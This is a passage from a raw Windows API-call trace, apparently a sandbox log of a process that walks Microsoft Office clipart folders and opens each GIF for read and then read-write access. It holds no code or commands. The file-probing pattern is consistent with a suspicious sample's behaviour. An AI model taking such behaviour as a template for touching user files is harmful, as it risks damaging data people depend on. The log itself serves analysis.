Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0100.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.837] AreFileApisANSI () returned 1 [0100.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0100.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0100.837] AreFileApisANSI () returned 1 [0100.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0100.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 69 [0100.837] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.889] GetFileType (hFile=0x27c) returned 0x1 [0100.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0100.889] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.896] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.897] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.897] CloseHandle (hObject=0x27c) returned 1 [0100.922] AreFileApisANSI () returned 1 [0100.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0100.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 69 [0100.922] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.922] GetFileType (hFile=0x27c) returned 0x1 [0100.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0100.922] CloseHandle (hObject=0x27c) returned 1 [0100.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0100.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0100.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0100.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0100.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0100.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0100.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0100.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0100.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.924] AreFileApisANSI () returned 1 [0100.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0100.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 69 [0100.924] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00169_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14ff)) returned 1 [0100.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0100.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0100.924] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.924] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.924] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2420, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00170_.GIF", cAlternateFileName="")) returned 1 [0100.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0100.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0100.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0100.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0100.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x603f8 [0100.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0100.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0100.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x603f8 | out: hHeap=0x20000) returned 1 [0100.925] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.925] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.925] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.925] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0100.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.925] AreFileApisANSI () returned 1 [0100.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0100.925] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.925] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0100.925] AreFileApisANSI () returned 1 [0100.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ab20 [0100.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8ab20, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 69 [0100.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.926] GetFileType (hFile=0x27c) returned 0x1 [0100.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0100.926] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.926] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.926] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.926] CloseHandle (hObject=0x27c) returned 1 [0100.926] AreFileApisANSI () returned 1 [0100.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8afe0 [0100.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8afe0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 69 [0100.927] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.927] GetFileType (hFile=0x27c) returned 0x1 [0100.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0100.927] CloseHandle (hObject=0x27c) returned 1 [0100.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0100.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0100.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0100.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0100.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0100.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0100.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.928] AreFileApisANSI () returned 1 [0100.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0100.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 69 [0100.928] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00170_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2420)) returned 1 [0100.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0100.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0100.928] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.928] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.928] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1398, dwReserved0=0x313f518, 